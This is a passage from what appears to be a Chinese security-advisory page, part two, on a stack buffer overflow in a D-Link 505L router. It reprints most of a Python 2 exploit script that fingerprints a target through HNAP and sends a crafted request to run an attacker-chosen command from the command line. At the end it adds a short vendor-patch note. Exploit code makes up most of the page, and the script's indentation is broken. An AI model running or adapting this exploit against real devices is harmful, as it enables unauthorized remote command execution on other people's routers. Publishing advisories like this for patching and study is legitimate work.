505L栈缓冲区溢出漏洞(2)

def _request(self, data=None):
        req = urllib2.Request(self.url, data)
        try:
            data = urllib2.urlopen(req).read()
        except urllib2.HTTPError as e:
            data = ""

if e.code == 500:
                self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!")
            else:
                self._debug_error("Unexpected response: %s" % (str(e)))

return data

def fingerprint(self):
        hnap_info = self._request()

for device in self.VULNERABLE_DEVICES:
            if device.match(hnap_info):
                self._debug_message("Identified target as %s v%s" % (device.model, device.version))
                return device

self._debug_error("Could not identify target!")
        return None

def execute(self, device, command=DEFAULT_COMMAND):
        self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version))
        return self._request(self._build_exploit(device, command))
       
    def exploit(self, command=DEFAULT_COMMAND):
        device = self.fingerprint()
        if device:
            return self.execute(device, command)
        else:
            return ""

if __name__ == "__main__":
    if len(sys.argv) != 3: 
        print "Usage: %s <target ip> <command to execute>" % sys.argv[0]
        sys.exit(1)

target = sys.argv[1]
    command = sys.argv[2]

print "\n" + Vulnerability(target).exploit(command)

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
?name=SAP10029

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/16d38840661d9ee2f9571a5e84a84612.html